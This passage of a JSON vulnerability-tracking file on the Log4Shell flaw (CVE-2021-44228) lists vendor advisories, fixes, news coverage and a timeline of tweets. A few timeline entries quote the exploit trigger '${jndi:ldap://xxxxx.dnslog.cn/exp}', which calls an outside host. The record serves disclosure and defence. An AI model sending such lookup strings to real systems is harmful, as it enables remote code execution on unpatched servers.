"https://www.blackhat.com/us-16/briefings/schedule/#a-journey-from-jndildap-manipulation-to-remote-code-execution-dream-land-3345" }, { "name": "https://twitter.com/aksquaretech/status/1469297067948347394", "type": "EVIDENCE", "url": "https://twitter.com/aksquaretech/status/1469297067948347394" }, { "name": "https://rules.emergingthreatspro.com/open/", "type": "FIX", "url": "https://rules.emergingthreatspro.com/open/" }, { "name": "RHSB-2021-009 Log4Shell - Remote Code Execution - log4j", "type": "FIX", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "name": "https://www.suse.com/security/cve/CVE-2021-44228.html", "type": "FIX", "url": "https://www.suse.com/security/cve/CVE-2021-44228.html" }, { "name": "https://security-tracker.debian.org/tracker/CVE-2021-44228", "type": "FIX", "url": "https://security-tracker.debian.org/tracker/CVE-2021-44228" }, { "name": "https://ubuntu.com/security/CVE-2021-44228", 
"type": "FIX", "url": "https://ubuntu.com/security/CVE-2021-44228" }, { "name": "Log4j RCE: Emergency patch issued to plug critical auth-free code execution hole in widely-used logging utility", "type": "EVIDENCE", "url": "https://www.theregister.com/2021/12/10/log4j_remote_code_execution_vuln_patch_issued/" }, { "name": "https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce", "type": "EVIDENCE", "url": "https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce" }, { "name": "https://twitter.com/chvancooten/status/1469340927923826691", "type": "EVIDENCE", "url": "https://twitter.com/chvancooten/status/1469340927923826691" }, { "name": "VMSA-2021-0028", "type": "FIX", "url": "https://www.vmware.com/security/advisories/VMSA-2021-0028.html" }, { "name": "https://www.cnblogs.com/yyhuni/p/15088134.html", "type": "EVIDENCE", "url": "https://www.cnblogs.com/yyhuni/p/15088134.html" }, { "name": "CVE-2021-44228 \u2013 Log4j 2 Vulnerability Analysis", "type": "EVIDENCE", "url": "https://www.randori.com/blog/cve-2021-44228/" }, { "name": "CVE-2021-44228-Log4Shell-Hashes", "type": "EVIDENCE", "url": "https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes" }, { "name": "Using Anchore Enterprise to Detect and Prevent Log4Shell, the Log4j Zero-Day Vulnerability", "type": "EVIDENCE", "url": "https://anchore.com/blog/using-anchore-enterprise-to-detect-prevent-log4j-zero-day/" }, { "name": "How to detect the Log4j vulnerability in your applications", "type": "EVIDENCE", "url": "https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html" }, { "name": "https://developers.slashdot.org/story/21/12/10/2131259/new-zero-day-in-the-log4j-java-library-is-already-being-exploited", "type": "EVIDENCE", "url": "https://developers.slashdot.org/story/21/12/10/2131259/new-zero-day-in-the-log4j-java-library-is-already-being-exploited" }, { "name": 
"https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/", "type": "EVIDENCE", "url": "https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/" }, { "name": "https://blog.cloudflare.com/how-cloudflare-security-responded-to-log4j2-vulnerability/", "type": "EVIDENCE", "url": "https://blog.cloudflare.com/how-cloudflare-security-responded-to-log4j2-vulnerability/" }, { "name": "https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/", "type": "EVIDENCE", "url": "https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/" }, { "name": "https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/", "type": "EVIDENCE", "url": "https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/" }, { "name": "https://www.wired.com/story/log4j-flaw-hacking-internet/", "type": "EVIDENCE", "url": "https://www.wired.com/story/log4j-flaw-hacking-internet/" }, { "name": "https://github.com/returntocorp/semgrep-rules/pull/1650/commits/ecfc32623eec718d61ec83b9196574f333191008/", "type": "EVIDENCE", "url": "https://github.com/returntocorp/semgrep-rules/pull/1650/commits/ecfc32623eec718d61ec83b9196574f333191008" }, { "name": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "type": "EVIDENCE", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "name": "https://www.cisa.gov/news/2021/12/11/statement-cisa-director-easterly-log4j-vulnerability", "type": "EVIDENCE", "url": "https://www.cisa.gov/news/2021/12/11/statement-cisa-director-easterly-log4j-vulnerability" }, { "name": "https://cloud.google.com/blog/products/identity-security/cloud-armor-waf-rule-to-help-address-apache-log4j-vulnerability", "type": "FIX", "url": "https://cloud.google.com/blog/products/identity-security/cloud-armor-waf-rule-to-help-address-apache-log4j-vulnerability" }, { "name": 
"https://www.reddit.com/r/netsec/comments/re468q/log4shell_using_the_vulnerability_to_patch_the/", "type": "FIX", "url": "https://www.reddit.com/r/netsec/comments/re468q/log4shell_using_the_vulnerability_to_patch_the/" }, { "name": "Logout4Shell", "type": "FIX", "url": "https://github.com/Cybereason/Logout4Shell" }, { "name": "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/log4shell-vulnerability-is-the-coal-in-our-stocking-for-2021/", "type": "EVIDENCE", "url": "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/log4shell-vulnerability-is-the-coal-in-our-stocking-for-2021/" }, { "name": "https://github.com/christophetd/log4shell-vulnerable-app", "type": "EVIDENCE", "url": "https://github.com/christophetd/log4shell-vulnerable-app" }, { "name": "https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22", "type": "EVIDENCE", "url": "https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22" }, { "name": "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/log4shell-vulnerability-is-the-coal-in-our-stocking-for-2021/", "type": "EVIDENCE", "url": "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/log4shell-vulnerability-is-the-coal-in-our-stocking-for-2021/" }, { "name": "https://twitter.com/canrevagency/status/1469487239671468033", "type": "EVIDENCE", "url": "https://twitter.com/canrevagency/status/1469487239671468033" }, { "name": "https://twitter.com/sans_isc/status/1469653801581875208", "type": "EVIDENCE", "url": "https://twitter.com/sans_isc/status/1469653801581875208" }, { "name": "https://twitter.com/rayhan0x01", "type": "EVIDENCE", "url": "https://twitter.com/rayhan0x01" }, { "name": "https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592", "type": "EVIDENCE", "url": "https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592" }, { "name": "https://twitter.com/lukolejnik/status/1469327074271899652", "type": "EVIDENCE", "url": 
"https://twitter.com/lukolejnik/status/1469327074271899652" }, { "name": "https://twitter.com/cyb3rops/status/1469405846010572816", "type": "EVIDENCE", "url": "https://twitter.com/cyb3rops/status/1469405846010572816" }, { "name": "Akamai", "type": "ADVISORY", "url": "https://www.akamai.com/blog/news/CVE-2021-44228-Zero-Day-Vulnerability" }, { "name": "Apache Druid", "type": "ADVISORY", "url": "https://github.com/apache/druid/pull/12051" }, { "name": "Apache Flink", "type": "ADVISORY", "url": "https://flink.apache.org/2021/12/10/log4j-cve.html" }, { "name": "Apache LOG4J", "type": "ADVISORY", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "name": "Apache Kafka", "type": "ADVISORY", "url": "https://lists.apache.org/thread/lgbtvvmy68p0059yoyn9qxzosdmx4jdv" }, { "name": "Apache Solr", "type": "ADVISORY", "url": "https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228" }, { "name": "Apero CAS", "type": "ADVISORY", "url": "https://apereo.github.io/2021/12/11/log4j-vuln/" }, { "name": "Aptible", "type": "ADVISORY", "url": "https://status.aptible.com/incidents/gk1rh440h36s?u=zfbcrbt2lkv4" }, { "name": "Atlassian", "type": "ADVISORY", "url": "https://confluence.atlassian.com/kb/faq-for-cve-2021-44228-1103069406.html" }, { "name": "Automox", "type": "ADVISORY", "url": "https://blog.automox.com/log4j-critical-vulnerability-scores-a-10" }, { "name": "AWS", "type": "ADVISORY", "url": "https://aws.amazon.com/security/security-bulletins/AWS-2021-005/" }, { "name": "AZURE Datalake store java", "type": "ADVISORY", "url": "https://github.com/Azure/azure-data-lake-store-java/blob/ed5d6304783286c3cfff0a1dee457a922e23ad48/CHANGES.md#version-2310" }, { "name": "BACKBLAZE", "type": "ADVISORY", "url": "https://twitter.com/backblaze/status/1469477224277368838" }, { "name": "BitNami By VMware", "type": "ADVISORY", "url": "https://docs.bitnami.com/general/security/security-2021-12-10/" }, { "name": "Broadcom", "type": "ADVISORY", "url": 
"https://support.broadcom.com/security-advisory/content/security-advisories/Symantec-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerability/SYMSA19793" }, { "name": "CarbonBlack", "type": "ADVISORY", "url": "https://community.carbonblack.com/t5/Threat-Research-Docs/Log4Shell-Log4j-Remote-Code-Execution-CVE-2021-44228/ta-p/109134" }, { "name": "Cerberus FTP", "type": "ADVISORY", "url": "https://support.cerberusftp.com/hc/en-us/articles/4412448183571-Cerberus-is-not-affected-by-CVE-2021-44228-log4j-0-day-vulnerability" }, { "name": "CheckPoint", "type": "ADVISORY", "url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=\u0026solutionid=sk176865\u0026partition=General\u0026product=IPS" }, { "name": "Cisco: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd", "type": "ADVISORY", "url": "" }, { "name": "Citrix", "type": "ADVISORY", "url": "https://support.citrix.com/article/CTX335705" }, { "name": "CloudFlare", "type": "ADVISORY", "url": "https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/" }, { "name": "CPanel", "type": "ADVISORY", "url": "https://forums.cpanel.net/threads/log4j-cve-2021-44228-does-it-affect-cpanel.696249/" }, { "name": "CommVault https://community.commvault.com/technical-q-a-2/log4j-been-used-in-commvault-1985?postid=11745#post11745", "type": "ADVISORY", "url": "" }, { "name": "Connect2id", "type": "ADVISORY", "url": "https://connect2id.com/blog/connect2id-server-12-5-1" }, { "name": "ConnectWise", "type": "ADVISORY", "url": "https://www.connectwise.com/company/trust/advisories" }, { "name": "ContrastSecurity", "type": "ADVISORY", "url": "https://support.contrastsecurity.com/hc/en-us/articles/4412612486548" }, { "name": "Coralogix", "type": "ADVISORY", "url": "https://twitter.com/Coralogix/status/1469713430659559425" }, { "name": "CouchBase", "type": "ADVISORY", "url": 
"https://forums.couchbase.com/t/ann-elasticsearch-connector-4-3-3-4-2-13-fixes-log4j-vulnerability/32402" }, { "name": "Cybereason", "type": "ADVISORY", "url": "https://www.cybereason.com/blog/cybereason-solutions-are-not-impacted-by-apache-log4j-vulnerability-cve-2021-44228" }, { "name": "Datto", "type": "ADVISORY", "url": "https://www.datto.com/blog/dattos-response-to-log4shell" }, { "name": "Debian", "type": "ADVISORY", "url": "https://security-tracker.debian.org/tracker/CVE-2021-44228" }, { "name": "Dell", "type": "ADVISORY", "url": "https://www.dell.com/support/kbdoc/fr-fr/000194372/dsn-2021-007-dell-response-to-apache-log4j-remote-code-execution-vulnerability" }, { "name": "Docker", "type": "ADVISORY", "url": "https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/" }, { "name": "DropWizard", "type": "ADVISORY", "url": "https://twitter.com/dropwizardio/status/1469285337524580359" }, { "name": "DynaTrace", "type": "ADVISORY", "url": "https://community.dynatrace.com/t5/Dynatrace-Open-Q-A/Impact-of-log4j-zero-day-vulnerability/m-p/177259/highlight/true#M19282" }, { "name": "Eclipse Foundation", "type": "ADVISORY", "url": "https://git.eclipse.org/r/c/tracecompass/org.eclipse.tracecompass/+/188751" }, { "name": "Elastic", "type": "ADVISORY", "url": "https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476" }, { "name": "EVLLABS JGAAP", "type": "ADVISORY", "url": "https://github.com/evllabs/JGAAP/releases/tag/v8.0.2" }, { "name": "F5 Networks", "type": "ADVISORY", "url": "https://support.f5.com/csp/article/K19026212" }, { "name": "F-Secure https://status.f-secure.com/incidents/sk8vmr0h34pd", "type": "ADVISORY", "url": "" }, { "name": "Forescout", "type": "ADVISORY", "url": "https://forescout.force.com/support/s/article/Important-security-information-related-to-Apache-Log4j-utility-CVE-2021-44228" }, { "name": "FusionAuth", "type": "ADVISORY", "url": 
"https://fusionauth.io/blog/2021/12/10/log4j-fusionauth/" }, { "name": "Ghidra", "type": "ADVISORY", "url": "https://github.com/NationalSecurityAgency/ghidra/blob/2c73c72f0ba2720c6627be4005a721a5ebd64b46/README.md#warning" }, { "name": "GitHub", "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "name": "Atos Unify", "type": "ADVISORY", "url": "https://networks.unify.com/security/advisories/OBSO-2112-01" }, { "name": "GoAnywhere", "type": "ADVISORY", "url": "https://www.goanywhere.com/cve-2021-44228-goanywhere-mitigation-steps" }, { "name": "Google Cloud Armor WAF", "type": "ADVISORY", "url": "https://cloud.google.com/blog/products/identity-security/cloud-armor-waf-rule-to-help-address-apache-log4j-vulnerability" }, { "name": "GrayLog", "type": "ADVISORY", "url": "https://www.graylog.org/post/graylog-update-for-log4j" }, { "name": "GuardedBox", "type": "ADVISORY", "url": "https://twitter.com/GuardedBox/status/1469739834117799939" }, { "name": "HackerOne", "type": "ADVISORY", "url": "https://twitter.com/jobertabma/status/1469490881854013444" }, { "name": "Huawei", "type": "ADVISORY", "url": "https://www.huawei.com/en/psirt/security-notices/huawei-sn-20211210-01-log4j2-en" }, { "name": "HostiFi", "type": "ADVISORY", "url": "https://twitter.com/hostifi_net/status/1469511114824339464" }, { "name": "Informatica", "type": "ADVISORY", "url": "https://network.informatica.com/community/informatica-network/blog/2021/12/10/log4j-vulnerability-update" }, { "name": "Ivanti", "type": "ADVISORY", "url": "https://forums.ivanti.com/s/article/CVE-2021-44228-Java-logging-library-log4j-Ivanti-Products-Impact-Mapping?language=en_US" }, { "name": "Imperva", "type": "ADVISORY", "url": "https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/" }, { "name": "JAMF NATION", "type": "ADVISORY", "url": "https://community.jamf.com/t5/jamf-pro/third-party-security-issue/td-p/253740" }, { "name": "JazzSM DASH IBM", "type": 
"ADVISORY", "url": "https://www.ibm.com/support/pages/node/6525552" }, { "name": "Jenkins", "type": "ADVISORY", "url": "https://www.jenkins.io/blog/2021/12/10/log4j2-rce-CVE-2021-44228/" }, { "name": "JFROG", "type": "ADVISORY", "url": "https://twitter.com/jfrog/status/1469385793823199240" }, { "name": "Jitsi", "type": "ADVISORY", "url": "https://github.com/jitsi/security-advisories/blob/4e1ab58585a8a0593efccce77d5d0e22c5338605/advisories/JSA-2021-0004.md" }, { "name": "Keycloak", "type": "ADVISORY", "url": "https://github.com/keycloak/keycloak/discussions/9078" }, { "name": "Kafka Connect CosmosDB", "type": "ADVISORY", "url": "https://github.com/microsoft/kafka-connect-cosmosdb/blob/0f5d0c9dbf2812400bb480d1ff0672dfa6bb56f0/CHANGELOG.md" }, { "name": "LucentSKY", "type": "ADVISORY", "url": "https://twitter.com/LucentSky/status/1469358706311974914" }, { "name": "Lightbend", "type": "ADVISORY", "url": "https://discuss.lightbend.com/t/regarding-the-log4j2-vulnerability-cve-2021-44228/9275" }, { "name": "Macchina io", "type": "ADVISORY", "url": "https://twitter.com/macchina_io/status/1469611606569099269" }, { "name": "McAfee", "type": "ADVISORY", "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=KB95091" }, { "name": "Metabase", "type": "ADVISORY", "url": "https://github.com/metabase/metabase/commit/8bfce98beb25e48830ac2bfd57432301c5e3ab37" }, { "name": "Minecraft", "type": "ADVISORY", "url": "https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition" }, { "name": "N-able", "type": "ADVISORY", "url": "https://www.n-able.com/security-and-privacy/apache-log4j-vulnerability" }, { "name": "NELSON", "type": "ADVISORY", "url": "https://github.com/getnelson/nelson/blob/f4d3dd1f1d4f8dfef02487f67aefb9c60ab48bf5/project/custom.scala" }, { "name": "NetApp", "type": "ADVISORY", "url": "https://security.netapp.com/advisory/ntap-20211210-0007/" }, { "name": "Netflix", "type": "ADVISORY", "url": 
"https://github.com/search?q=org%3ANetflix+CVE-2021-44228\u0026type=commits" }, { "name": "NextGen Healthcare Mirth", "type": "ADVISORY", "url": "https://github.com/nextgenhealthcare/connect/discussions/4892#discussioncomment-1789526" }, { "name": "Newrelic", "type": "ADVISORY", "url": "https://github.com/newrelic/newrelic-java-agent/issues/605" }, { "name": "Okta", "type": "ADVISORY", "url": "https://sec.okta.com/articles/2021/12/log4shell" }, { "name": "OpenHab", "type": "ADVISORY", "url": "https://github.com/openhab/openhab-distro/pull/1343" }, { "name": "OpenNMS", "type": "ADVISORY", "url": "https://www.opennms.com/en/blog/2021-12-10-opennms-products-affected-by-apache-log4j-vulnerability-cve-2021-44228/" }, { "name": "OpenSearch", "type": "ADVISORY", "url": "https://discuss.opendistrocommunity.dev/t/log4j-patch-for-cve-2021-44228/7950" }, { "name": "Oracle", "type": "ADVISORY", "url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html" }, { "name": "Palo-Alto Networks", "type": "ADVISORY", "url": "https://security.paloaltonetworks.com/CVE-2021-44228" }, { "name": "PaperCut", "type": "ADVISORY", "url": "https://www.papercut.com/support/known-issues/#PO-684" }, { "name": "Positive Technologies", "type": "ADVISORY", "url": "https://twitter.com/ptsecurity/status/1469398376978522116" }, { "name": "Pulse Secure", "type": "ADVISORY", "url": "https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44933/?kA13Z000000L3dR" }, { "name": "Puppet", "type": "ADVISORY", "url": "https://puppet.com/blog/puppet-response-to-remote-code-execution-vulnerability-cve-2021-44228/" }, { "name": "Pure Storage", "type": "ADVISORY", "url": "https://support.purestorage.com/Field_Bulletins/Interim_Security_Advisory_Regarding_CVE-2021-44228_(%22log4j%22)" }, { "name": "Qlik", "type": "ADVISORY", "url": "https://community.qlik.com/t5/Support-Updates-Blog/Vulnerability-Testing-Apache-Log4j-reference-CVE-2021-44228-also/ba-p/1869368" }, { "name": "RedHat", "type": "ADVISORY", 
"url": "https://access.redhat.com/security/cve/cve-2021-44228" }, { "name": "RunDeck by PagerDuty", "type": "ADVISORY", "url": "https://docs.rundeck.com/docs/history/CVEs/" }, { "name": "RSA", "type": "ADVISORY", "url": "https://community.rsa.com/t5/general-security-advisories-and/rsa-customer-advisory-apache-vulnerability-log4j2-cve-2021-44228/ta-p/660501" }, { "name": "Rubrik", "type": "ADVISORY", "url": "https://support.rubrik.com/s/announcementdetail?Id=a406f000001PwOcAAK" }, { "name": "SailPoint", "type": "ADVISORY", "url": "https://community.sailpoint.com/t5/IdentityIQ-Blog/IdentityIQ-log4j-Remote-Code-Execution-Vulnerability/ba-p/206681" }, { "name": "Salesforce", "type": "ADVISORY", "url": "https://help.salesforce.com/s/articleView?id=000363736\u0026type=1" }, { "name": "Security Onion", "type": "ADVISORY", "url": "https://blog.securityonion.net/2021/12/security-onion-2390-20211210-hotfix-now.html" }, { "name": "ServiceNow", "type": "ADVISORY", "url": "https://support.servicenow.com/kb?id=kb_article_view\u0026sysparm_article=KB1000959" }, { "name": "Sesam Info", "type": "ADVISORY", "url": "https://twitter.com/sesam_info/status/1469711992122486791" }, { "name": "Shibboleth", "type": "ADVISORY", "url": "http://shibboleth.net/pipermail/announce/2021-December/000253.html" }, { "name": "SLF4J", "type": "ADVISORY", "url": "http://slf4j.org/log4shell.html" }, { "name": "SmileCDR", "type": "ADVISORY", "url": "https://www.smilecdr.com/our-blog/a-statement-on-log4shell-cve-2021-44228" }, { "name": "Sophos", "type": "ADVISORY", "url": "https://www.sophos.com/en-us/security-advisories/sophos-sa-20211210-log4j-rce" }, { "name": "SonarSource", "type": "ADVISORY", "url": "https://community.sonarsource.com/t/sonarqube-and-the-log4j-vulnerability/54721" }, { "name": "SonicWall", "type": "ADVISORY", "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032" }, { "name": "Spring Boot", "type": "ADVISORY", "url": 
"https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot" }, { "name": "SUSE", "type": "ADVISORY", "url": "https://www.suse.com/security/cve/CVE-2021-44228.html" }, { "name": "Sterling Order IBM", "type": "ADVISORY", "url": "https://www.ibm.com/support/pages/node/6525544" }, { "name": "Swingset", "type": "ADVISORY", "url": "https://github.com/bpangburn/swingset/blob/017452b2d0d8370871f43a68043dacf53af7f759/swingset/CHANGELOG.txt#L10" }, { "name": "Talend", "type": "ADVISORY", "url": "https://jira.talendforge.org/browse/TCOMP-2054" }, { "name": "Tanium", "type": "ADVISORY", "url": "https://community.tanium.com/s/article/How-Tanium-Can-Help-with-CVE-2021-44228-Log4Shell" }, { "name": "TrendMicro", "type": "ADVISORY", "url": "https://success.trendmicro.com/solution/000289940" }, { "name": "Ubiquiti-UniFi-UI", "type": "ADVISORY", "url": "https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1" }, { "name": "Vespa ENGINE", "type": "ADVISORY", "url": "https://github.com/vespa-engine/blog/blob/f281ce4399ed3e97b4fed32fcc36f9ba4b17b1e2/_posts/2021-12-10-log4j-vulnerability.md" }, { "name": "VMware", "type": "ADVISORY", "url": "https://www.vmware.com/security/advisories/VMSA-2021-0028.html" }, { "name": "Wallarm", "type": "ADVISORY", "url": "https://lab.wallarm.com/cve-2021-44228-mitigation-update/" }, { "name": "Wowza", "type": "ADVISORY", "url": "https://www.wowza.com/docs/known-issues-with-wowza-streaming-engine#log4j2-cve" }, { "name": "Yandex-Cloud", "type": "ADVISORY", "url": "https://github.com/yandex-cloud/docs/blob/6ff6c676787756e7dd6101c53b051e4cd04b3e85/ru/overview/security-bulletins/index.md#10122021--cve-2021-44228--%D1%83%D0%B4%D0%B0%D0%BB%D0%B5%D0%BD%D0%BD%D0%BE%D0%B5-%D0%B2%D1%8B%D0%BF%D0%BE%D0%BB%D0%BD%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BA%D0%BE%D0%B4%D0%B0-log4shell-apache-log4j" }, { "name": "ZAMMAD", "type": "ADVISORY", "url": 
"https://community.zammad.org/t/cve-2021-44228-elasticsearch-users-be-aware/8256" }, { "name": "Zaproxy", "type": "ADVISORY", "url": "https://www.zaproxy.org/blog/2021-12-10-zap-and-log4shell/" }, { "name": "ZSCALER", "type": "ADVISORY", "url": "https://www.zscaler.fr/blogs/security-research/security-advisory-log4j-0-day-remote-code-execution-vulnerability-cve-2021" }, { "name": "Canadian Centre for Cyber Security - Statement from the Minister of National Defence on Apache Vulnerability and Call to Canadian Organizations to Take Urgent Action", "type": "EVIDENCE", "url": "https://cyber.gc.ca/en/news/statement-minister-national-defence-apache-vulnerability" }, { "name": "https://twitter.com/CyberRaiju/status/1469505677580124160", "type": "EVIDENCE", "url": "https://twitter.com/CyberRaiju/status/1469505677580124160" }, { "name": "https://twitter.com/0gtweet/status/1469661769547362305", "type": "EVIDENCE", "url": "https://twitter.com/0gtweet/status/1469661769547362305" }, { "name": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/", "type": "FIX", "url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/" }, { "name": "Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation", "type": "EVIDENCE", "url": "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/" }, { "name": "https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/", "type": "FIX", "url": "https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/" }, { "name": "https://twitter.com/yazicivo/status/1469349956880408583", "type": "EVIDENCE", "url": "https://twitter.com/yazicivo/status/1469349956880408583" }, { "name": "log4j: between a rock and a hard places", "type": "EVIDENCE", "url": "https://crawshaw.io/blog/log4j" }, { "name": "Log4j: Between a rock and a hard place - comments", "type": 
"EVIDENCE", "url": "https://news.ycombinator.com/item?id=29523608" }, { "content": "Dumped my Log4J Yara rules here: https://github.com/timb-machine/log4j/. Rather than look for vulnerable code, the primary idea was to identify projects that are pulling Log4J in.", "name": "https://twitter.com/timb_machine/status/1470091290289352704", "timestamp": "2021-12-12T18:00", "type": "EVIDENCE", "url": "https://twitter.com/timb_machine/status/1470091290289352704" }, { "name": "Yara rules for log4j", "type": "EVIDENCE", "url": "https://github.com/timb-machine/log4j/" }, { "content": "#log4j\n${jndi:ldap://xxxxx.dnslog.cn/exp}", "name": "https://hypixel.net/threads/psa-there-is-a-fatal-remote-code-execution-exploit-in-minecraft-and-its-by-typing-in-chat.4703238/", "tags": [ "timeline" ], "timestamp": "2021-12-09T05:49TZ??", "type": "EVIDENCE", "url": "https://hypixel.net/threads/psa-there-is-a-fatal-remote-code-execution-exploit-in-minecraft-and-its-by-typing-in-chat.4703238/" }, { "name": "https://old.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/", "type": "EVIDENCE", "url": "https://old.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/" }, { "content": "#log4j\n${jndi:ldap://xxxxx.dnslog.cn/exp}", "name": "https://twitter.com/sirifu4k1/status/1468951859381485573", "tags": [ "timeline", "#log4j", "first_tweet" ], "timestamp": "2021-12-09T14:33", "type": "EVIDENCE", "url": "https://twitter.com/sirifu4k1/status/1468951859381485573" }, { "content": "#log4j \u96be\u4ee5\u60f3\u8c61\uff0c\u8fd9\u6837\u4e00\u4e2a RCE \u6f0f\u6d1e\u5728\u534a\u4e2a\u591a\u6708\u524d\u88ab\u53d1\u73b0\uff0c5\u5929\u524d\u88ab\u4fee\u590d\uff0c\u7ed3\u679c\u5230\u4eca\u5929\u8fde CVE \u90fd\u6ca1\u6709\uff0c\u8fde\u65b0\u7684\u6b63\u5f0f Release \u90fd\u6ca1\u53d1\u3002", "name": "https://twitter.com/CattusGlavo/status/1469010118163374089", "tags": [ "timeline", "#log4j" ], "timestamp": "2021-12-09T18:24", "type": 
"EVIDENCE", "url": "https://twitter.com/CattusGlavo/status/1469010118163374089" }, { "content": "\ud83d\udd25 Patch log4j NOW ! \ud83d\udd25 CVE-2021-44228 \ud83d\udd25 Path: log4j-2.15.0-rc1 and log4j-2.15.0-rc2 Set log4j2.formatMsgNoLookups to true. #log4j #apache #RCE #Log4Shell", "name": "https://twitter.com/domineefh/status/1469237240341704705", "tags": [ "timeline", "#log4shell" ], "timestamp": "2021-12-10T09:27", "type": "EVIDENCE", "url": "https://twitter.com/domineefh/status/1469237240341704705" }, { "content": "RCE 0-day exploit found in log4j, a popular Java logging package https://lunasec.io/docs/blog/log4j-zero-day/", "name": "https://twitter.com/_r_netsec/status/1469120458083962882", "tags": [ "timeline" ], "timestamp": "2021-12-10T01:43", "type": "EVIDENCE", "url": "https://twitter.com/_r_netsec/status/1469120458083962882" }, { "content": "#log4j Using -Dlog4j2.formatMsgNoLookups=true to disable message pattern lookup can solve this problem, but if you rely on it, please update your log4j2 as soon as possible.", "name": "https://twitter.com/CattusGlavo/status/14690131867413012499", "tags": [ "timeline", "#log4j" ], "timestamp": "2021-12-09T18:36", "type": "FIX", "url": "https://twitter.com/CattusGlavo/status/1469013186741301249" }, { "content": "Worst Log4j RCE Zeroday Dropped on Internet https://cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html #apache #log4j #bugbounty #security #SecurityBreach #cybersecurity", "name": "https://twitter.com/cyberkendra/status/1469028640511836163", "tags": [ "timeline", "#log4j" ], "timestamp": "2021-12-09T19:38", "type": "EVIDENCE", "url": "https://twitter.com/cyberkendra/status/1469028640511836163" }, { "content": "#log4j ${jndi:ldap:// \u8fd9\u6f0f\u6d1e\u6709\u70b9\u6050\u6016\uff0c\u8fd8\u5728\u7528\u65e7\u7248JDK\u7684\u8981\u6ce8\u610f\u4e86y", "name": "https://twitter.com/h113sdx/status/1469010902183661568", "tags": [ "timeline", "#log4j" ], "timestamp": "2021-12-09T18:27", "type": "EVIDENCE", 
"url": "https://twitter.com/h113sdx/status/1469010902183661568" }, { "content": "We wrote up a summary on the log4j 0-day that was found earlier today. This is going to be fun for a lot of people scrambling to patch this tonight!", "name": "https://twitter.com/freeqaz/status/1469121757361569793", "tags": [ "timeline" ], "timestamp": "2021-12-10T01:48", "type": "EVIDENCE", "url": "https://twitter.com/freeqaz/status/1469121757361569793" }, { "content": "Earliest evidence we\u2019ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don\u2019t see evidence of mass exploitation until after public disclosure.", "name": "https://twitter.com/eastdakota/status/1469800951351427073", "tags": [ "timeline" ], "timestamp": "2021-12-11T10:47", "type": "EVIDENCE", "url": "https://twitter.com/eastdakota/status/1469800951351427073" }, { "content": "@GreyNoise is currently seeing 2 unique IP\u0027s scanning the internet for the new Apache Log4j RCE vulnerability (No CVE assigned yet). A tag to track this activity on http://greynoise.io will be made available shortly and linked as a reply when released.", "name": "https://twitter.com/_mattata/status/1469144854672379905", "tags": [ "timeline" ], "timestamp": "2021-12-09", "type": "EVIDENCE", "url": "https://twitter.com/_mattata/status/1469144854672379905" }, { "name": "Restrict LDAP access via JNDI #608", "tags": [ "timeline" ], "timestamp": "2021-11-30", "type": "EVIDENCE", "url": "https://github.com/apache/logging-log4j2/pull/608" }, { "content": "Dealing with CVE-2021-44228 has shown the JNDI has significant security issues. While we have mitigated what we are aware of it would be safer for users to completely disable it by default, especially since the large majority 